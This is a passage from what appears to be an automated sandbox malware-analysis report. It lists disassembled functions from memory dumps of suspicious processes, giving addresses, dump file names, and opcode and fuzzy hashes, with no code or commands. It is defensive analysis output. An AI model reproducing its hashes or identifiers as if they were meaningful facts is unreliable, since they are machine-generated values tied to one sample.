                                                            Function 00007FFD9BAD06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction ID: 2e81c1da0b918a139826e1f3d2a9b4d61e8dded6c25d17f1babbac126a3091ec
                                                            • Opcode Fuzzy Hash: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction Fuzzy Hash: D8C08C04F0F40F00F43073EE14360ACB1009BC4A10FD30332D00C800E19CDD22C5818E
                                                            Function 00007FFD9BAD308E Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e37cdc3615825068cff315a29f7d4d104bb4601dc22802fca50c847c084f6aa1
                                                            • Instruction ID: c187ee74ab688bac4a76afddc5a2e4610882d4efca8566c45e7386ce615e4fde
                                                            • Opcode Fuzzy Hash: e37cdc3615825068cff315a29f7d4d104bb4601dc22802fca50c847c084f6aa1
                                                            • Instruction Fuzzy Hash: 43C0E914F1A91D4AE9B4A3A440756FD11D19F95B00B560674A04DD71E2DD5C69408645
                                                            Function 00007FFD9BAD34BF Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32d67519079df498516489f663c6b66fa9ce6fa7099d4db46eaefa5edeef4371
                                                            • Instruction ID: 4cda587f8beccc05917d532c4acc1d8c29118d5ed9b56069addfbada7dab9cd9
                                                            • Opcode Fuzzy Hash: 32d67519079df498516489f663c6b66fa9ce6fa7099d4db46eaefa5edeef4371
                                                            • Instruction Fuzzy Hash: E5C04C01F1CC2A07E65A66144C2567E04935F9472DFD502B4F41F872DFCD5D5D0207C6
                                                            Function 00007FFD9BAD06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction ID: 3081ca6566bc6c794f9a2d8f4748dfbef7a0c6ca5a8b3e32accbc2225c5f9fc5
                                                            • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction Fuzzy Hash: F6B01200D5B44F00E43433FB086616870409BC4104FC20270D40CC019198CD129442C6
                                                            Function 00007FFD9BAD6A8C Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction ID: 7be111d0d1522463fa43b2e0b16bb4ab735d9b9aed14eecc4ff76e7f33d18cb8
                                                            • Opcode Fuzzy Hash: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction Fuzzy Hash: EFB09201F0E12B56F1B003D4513927902E05FE4344F0B2738E85C861F2FDDCAE014045

                                                            Non-executed Functions

                                                            Function 00007FFD9BAD09B0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 47167712973b3a9a9e62675f81808e61468b2795b228273cbe5ec6e9cb2e28c3
                                                            • Instruction ID: 45bb93ee007dc86df233ca01b83b64989824cc2b1c04b407da0dfdee7615457e
                                                            • Opcode Fuzzy Hash: 47167712973b3a9a9e62675f81808e61468b2795b228273cbe5ec6e9cb2e28c3
                                                            • Instruction Fuzzy Hash: 5A51AF02B0942605E33A73FD78228F96B449FA927FB4843B7F45E8D0EB4D096086C2E5

                                                            Executed Functions

                                                            Function 00007FFD9BAB0D48 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Z_H
                                                            • API String ID: 0-3267294416
                                                            • Opcode ID: 487002bb919c1b40a7ef0b486a4d0e101569877a3d782cceeeb08caa9fde9ebc
                                                            • Instruction ID: f0f78675580693079a701c66ae55d8f4cbc5020a35c1d83200c265424966256a
                                                            • Opcode Fuzzy Hash: 487002bb919c1b40a7ef0b486a4d0e101569877a3d782cceeeb08caa9fde9ebc
                                                            • Instruction Fuzzy Hash: 4C913572A19A9D4FE79ADF6888657A87FE5FF59310F0501BED059CB2E2CBB81410CB00
                                                            Function 00007FFD9BAB1171 Relevance: .3, Instructions: 349COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e798280138f0c3dafa465e6faa706c205333fdc3c05c9640f96a92f55f9a12b
                                                            • Instruction ID: 73a2712b783edd667b7ab36974bbc81218fcb9218861f3e34cf7aecb7da3dd0f
                                                            • Opcode Fuzzy Hash: 2e798280138f0c3dafa465e6faa706c205333fdc3c05c9640f96a92f55f9a12b
                                                            • Instruction Fuzzy Hash: DEB12731A0864D8FDB58EF68C865AF97BE0FF1A311F0541BBE45DC71A2DA74A841CB81
                                                            Function 00007FFD9BAB0910 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1fc877b6dc4659d4d50e9d2919b31b904161a2694ddf5574928ce0186537395b
                                                            • Instruction ID: 9fdd233f504693134e36ebb00589a5213171175cfe405ae223140c6f289cc91f
                                                            • Opcode Fuzzy Hash: 1fc877b6dc4659d4d50e9d2919b31b904161a2694ddf5574928ce0186537395b
                                                            • Instruction Fuzzy Hash: 75413B22B0D6690FE328B7BCA4AA5F97B80DF59339B1405FFD45ECB1E7CD1868418285
                                                            Function 00007FFD9BAB0960 Relevance: .1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a65fe2ac71bff45dfef9d1cef16a87feef161a5b94f5e07b4c71005ce4b596a8
                                                            • Instruction ID: d90a01e8ef80cc7f8a99cb3dd715587fc8e1cfa7119df68d3c141b79a80c5335
                                                            • Opcode Fuzzy Hash: a65fe2ac71bff45dfef9d1cef16a87feef161a5b94f5e07b4c71005ce4b596a8
                                                            • Instruction Fuzzy Hash: 09314721B0D6291BE328B7BC646A5F977C1CF59376F1405FAE41EC71E7CC18AC414285
                                                            Function 00007FFD9BAB0998 Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ffe0fa9930b1ac67c1929093f50f9c353a8b7991890f7e9f7561f8cd817b60d
                                                            • Instruction ID: 7eac7acd4024840a01e7cb3f8bb24596412d53c739230734d0aa2f4fe7420aca
                                                            • Opcode Fuzzy Hash: 3ffe0fa9930b1ac67c1929093f50f9c353a8b7991890f7e9f7561f8cd817b60d
                                                            • Instruction Fuzzy Hash: FE215920B1E95D0FE758BB6C84AA6BA7BC2DF99320F1400BDE41EC32F6CC58AC414785
                                                            Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d1f6488d2bc5ede594b45525397c1355158fcadf00e8067d234cd63b65a7b113
                                                            • Instruction ID: 526a599aacba5ba47de935c4511c2d7358a9507db731241d89ca38b261462072
                                                            • Opcode Fuzzy Hash: d1f6488d2bc5ede594b45525397c1355158fcadf00e8067d234cd63b65a7b113
                                                            • Instruction Fuzzy Hash: 63214732B0D26D8FE332A7A99C211EC7B60EF42325F1541B3D0548B1D3DA786646CB85
                                                            Function 00007FFD9BAB2075 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10cad3ab40a93bb0d471bf15ba1ebd9e68b2fddbcdcbcede180ffab116093de0
                                                            • Instruction ID: f33d4e70d98bc13dfcf6ca7c74e32509e2063e535c267a0d198426ba906c475d
                                                            • Opcode Fuzzy Hash: 10cad3ab40a93bb0d471bf15ba1ebd9e68b2fddbcdcbcede180ffab116093de0
                                                            • Instruction Fuzzy Hash: 33116330F1DA2D4BEE74EBA89464AF97391FF58300F1245B6D01EC71A2DD68AD419F40
                                                            Function 00007FFD9BAB1FE8 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e48f0512546d8a4d28d4fdf3ce6c73654da50d5028fe88ad84d1e5576e580b2
                                                            • Instruction ID: 854a6d36602e58126c41adb8f0b65ff2c22d9505d7fef3310d6c5fe65dd6d8a8
                                                            • Opcode Fuzzy Hash: 6e48f0512546d8a4d28d4fdf3ce6c73654da50d5028fe88ad84d1e5576e580b2
                                                            • Instruction Fuzzy Hash: 56119831F1E93E5AEBB49B9894646F97691FF48310F1242B6D42ED31F1DE686E408F40
                                                            Function 00007FFD9BAB449C Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07d28e7ecd50a3784cb8d902da7d9ea3eaf8072eb73f913d3534d1ed4a770bc7
                                                            • Instruction ID: 2b64508034ec726319a517ab6e72b00a82b0d1b4a26d62b3b4c143dcab9fa9a9
                                                            • Opcode Fuzzy Hash: 07d28e7ecd50a3784cb8d902da7d9ea3eaf8072eb73f913d3534d1ed4a770bc7
                                                            • Instruction Fuzzy Hash: E111ED3090892C8FDBA8DB08C494BA973E1EB54310F2541A9D44ED32B1CF74AEC5CF45
                                                            Function 00007FFD9BAB5323 Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22e372dd386fd2e1ce9ccfa461cd16b02464873bfca25ae95ba86f22cc353b63
                                                            • Instruction ID: 7e8faebe623226484448de8e4a61cf14eecec026fe42e0d323407f1a01b06418
                                                            • Opcode Fuzzy Hash: 22e372dd386fd2e1ce9ccfa461cd16b02464873bfca25ae95ba86f22cc353b63
                                                            • Instruction Fuzzy Hash: EE013021F1A95D4FEFB4E7B8807967822C1AF94750F0644B9D02EC71B2DDA8AD414B04
                                                            Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7587874943aabddc55e4cb2cbdb504b149a6b17dce2d72c6ca3d4850881c679f
                                                            • Instruction ID: 704d7cec44ec77c5cd57e3598e158e92764b703ec15b89d36f1fbc8b9bb9d53b
                                                            • Opcode Fuzzy Hash: 7587874943aabddc55e4cb2cbdb504b149a6b17dce2d72c6ca3d4850881c679f
                                                            • Instruction Fuzzy Hash: 6A110831B0D65D8FE732DBB988641EC7FB0EF42311F1644B7C054DB2A2EA7456458B84
                                                            Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 60f5b6df0efd5d76ab581a44411128c5cb7ff6bdd04abe2c967eb2214b592e78
                                                            • Instruction ID: 49156c4133ecbc92214c061cedb6dffd0f4f1717c02232c70b388290a3cc8973
                                                            • Opcode Fuzzy Hash: 60f5b6df0efd5d76ab581a44411128c5cb7ff6bdd04abe2c967eb2214b592e78
                                                            • Instruction Fuzzy Hash: 6301D231B0E29C8FE722DBA888641ECBFB0EF42310F1645F7C454DB2A2DA745645CB84
                                                            Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba0bf1fe1d2dbadcb18cfd296657756003e26580d05e82b8fd99caaad79c5e5d
                                                            • Instruction ID: 7ed0695e24f42f40795ee70f889eca074191c968a617928bd27f9be9eeb78f3a
                                                            • Opcode Fuzzy Hash: ba0bf1fe1d2dbadcb18cfd296657756003e26580d05e82b8fd99caaad79c5e5d
                                                            • Instruction Fuzzy Hash: ED01B131A0E28C8FE722DBA888641DCBFB0EF42310F1541E7D450DB2A6EA745644CB80
                                                            Function 00007FFD9BAB20A4 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction ID: aa31a2fddee9a90355922b24d78e51e8b8f0c7da79a606abdbd5e301fd388651
                                                            • Opcode Fuzzy Hash: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction Fuzzy Hash: 39F08634E1D92E8BEB74AB94D8646F97360FB44311F1241BAC05ED31A1DE786E85CF40
                                                            Function 00007FFD9BAB0C50 Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e6c8a65f480c208c98bc0cccd03d36c02706add7f9c23ab3809e7c3533f1ca16
                                                            • Instruction ID: f4a48168c5dd8d86f4aaea3a9fa3a96731f096634d174fa66563f8c543de3fed
                                                            • Opcode Fuzzy Hash: e6c8a65f480c208c98bc0cccd03d36c02706add7f9c23ab3809e7c3533f1ca16
                                                            • Instruction Fuzzy Hash: FE01A230E0E28D8FE731DBA488641DCBFB0EF46314F1541E7D454DB2A6EA785644CB45
                                                            Function 00007FFD9BAB1AD2 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7934caa6ba7b2217bafad98b7d17e54cb2c4fcab9c6cbc213fe7423c2ff7da79
                                                            • Instruction ID: c93bd8aff84c298741621e3c8d57fada902e3bf68c0f53030e4526585b05247e
                                                            • Opcode Fuzzy Hash: 7934caa6ba7b2217bafad98b7d17e54cb2c4fcab9c6cbc213fe7423c2ff7da79
                                                            • Instruction Fuzzy Hash: BFE03061F1A83E5FF7B0AB8880643B862D1EB6CB50F560276C41DD32A2DDA96E424B44
                                                            Function 00007FFD9BAB3C45 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8ffeaeea7125dbd1600dfeeb52f20fe17b4d8af7f547bd82c4d77bb27fec234
                                                            • Instruction ID: 7c7c10e09a9b3f2d2df71b50fb00928ff897437c728505d603262be98dd36d55
                                                            • Opcode Fuzzy Hash: d8ffeaeea7125dbd1600dfeeb52f20fe17b4d8af7f547bd82c4d77bb27fec234
                                                            • Instruction Fuzzy Hash: 33E06521F1A83D1FE7B4BB4C80243B872D2EB6C740F410276C01DC32A1DD686E424B40
                                                            Function 00007FFD9BAB0D01 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3fdffb10ddd7b51e3e1b1ed6c046b3f1874126c9c8c38e69e97b5a9e7a76e21
                                                            • Instruction ID: 4e4a3112a8fdfd7c4fd9c793aeef9f326705a9f6719e1e873beb44a06ec2f7ae
                                                            • Opcode Fuzzy Hash: c3fdffb10ddd7b51e3e1b1ed6c046b3f1874126c9c8c38e69e97b5a9e7a76e21
                                                            • Instruction Fuzzy Hash: 88F0BE30B0964E8EE769DBA9C4A06BD77E0AF65710F1042BAD019C32E5DAB86680CE44
                                                            Function 00007FFD9BAB6A11 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction ID: b488f9f5ded158572a7bc39ef764239cbb9ffd67bcbe0a173690e4e8a44199b8
                                                            • Opcode Fuzzy Hash: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction Fuzzy Hash: 1CE01220F1912E4BFBB4A794D8747B962A1AF98300F1240B9D81DD33E2DDB86F814F45
                                                            Function 00007FFD9BAB5384 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction ID: 3590204b54bedc8a9b5194a097adb6898d43efcd034f9f4a1780ee4bb5b22d0b
                                                            • Opcode Fuzzy Hash: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction Fuzzy Hash: 83E0EC24F1A82E4FEEA4E7A480786B822C2AF54750F0A40B4D42DC71B2DDACA9414B00
                                                            Function 00007FFD9BAB626F Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 272a02d5dea28fd23d2e029d5d8e4843bbe2285bf5a92b3a05671d3735980ef1
                                                            • Instruction ID: a0a2601e79726e0572c4fc7d705356d85de0c3c7b34c90b32c120cca09437605
                                                            • Opcode Fuzzy Hash: 272a02d5dea28fd23d2e029d5d8e4843bbe2285bf5a92b3a05671d3735980ef1
                                                            • Instruction Fuzzy Hash: 52E08620B1683C5FE370FB5880683B82292E75C700F010676C41DD3391DD681A428B80
                                                            Function 00007FFD9BAB0835 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9dcc5f58c200da376d9b9440fc0d163e93a3caf03f78842c60697e91c09875e3
                                                            • Instruction ID: 3b5ab8d54c414f672194965a0bbb642aa1913f992bec60f8a9339aa137129317
                                                            • Opcode Fuzzy Hash: 9dcc5f58c200da376d9b9440fc0d163e93a3caf03f78842c60697e91c09875e3
                                                            • Instruction Fuzzy Hash: B6C01210B5741D51D03473FEEC664F97740AF48128F864171E41D84096DC491597C596
                                                            Function 00007FFD9BAB0B9D Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction ID: 10ee5c29f0f85959e112b6dad68d3070c94e7f1628061354f3884ba774739a35
                                                            • Opcode Fuzzy Hash: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction Fuzzy Hash: 9AC0123061580E8FDA40B728C8858147790FB0E201FD500E0E00CC7161D65998508700
                                                            Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
